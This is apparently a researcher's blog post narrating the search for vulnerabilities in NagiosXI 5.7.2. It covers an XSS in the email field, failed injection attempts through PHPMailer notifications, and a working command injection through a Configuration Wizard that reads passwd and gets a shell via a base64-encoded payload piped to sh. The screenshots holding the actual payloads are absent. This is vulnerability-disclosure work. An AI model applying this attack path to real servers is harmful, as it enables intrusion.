Last time when I was checking NagiosXI is described here[1, 2, 3] so you could already get some 'basic introduction' to the topic. Below you will find new more details - this time for (again) 'latest' version (5.7.2). Here we go...
This time we will start here:
As usual I tried to identify some webapps bugs like XSS (to 'start somehere';)). So I started here:
I found that 'Email Address' is vulnerable to XSS, see below:
In the meantime I was looking for the reason in the source. This is one of the findings:
Next I watched NagiosXI weblog console, check this out (looks pretty familiar to few last cases described here):
Well... ;> I started to dig a bit with this field...
After I updated my account-email-settings I decided to send test notifications:
Few more attempts below:
...and 'few more' (hours of) checking source and logs:
And that's how I found this file:
Now, let's parse_argv():
I was wondering if I'm able to even try to run "the same" command using directly (only) bash (from target server):
I was. So the reason was something inside the webapp - not the payload itself... Checking:
Here (from bash-perspective) everything looks fine. So I was looking more and more source files, github links, and google resources. After preparing a proper (but-still-bash) payload I decided to test it again using 'Send Test Notifications':
No luck (screen from VMPlayer is the response for bash request started from runme.sh script).
I tried to ask ps|aux for some hint(s):
After 4 days... ;] I even decided to try to use some strace-magic:
Still nothing.During day5 (and also checking the logs from NagiosXI) I found a new hint - PHPMailer:
Ok. So: in my opinion I wasn't able to escape from new version of PHPMailer available in NagiosXI. That was the reason (but feel free to correct me (and my payload ;)) if I'm wrong).
Few more pages to read I found for example here:
Sample logs:
BTW: you can also (re)send your 'emails' (payloads) using 'My Scheduled Reports', check it out:
Few more example logs:
At this stage (day6 ;]) I decided to "leave it like this" here and go to the next (possible) bug (I'll found). So that's how I landed in one of the available Configuration Wizards:
I decided to give it a try (and prepare similar payload):
As you can see (last line on the screen above) there is an echo-output ;D of the command we tried to use. ;] Great, let's try one more time:
This time we should be here:
Ok, again:
[; I think we're already there... ;] Checking:
(Yep, I saw fopen() so I tried to read some passwd ;))
Now:
Bingo! ;]
Using few old tricks (like payload+base64+|sh) we should be somewhere here:
I think we'll stop here.
Special thanks goes to my Patreon: Daniel.
Thanks! You are awesome! ;)
See you next time!
Brak komentarzy:
Prześlij komentarz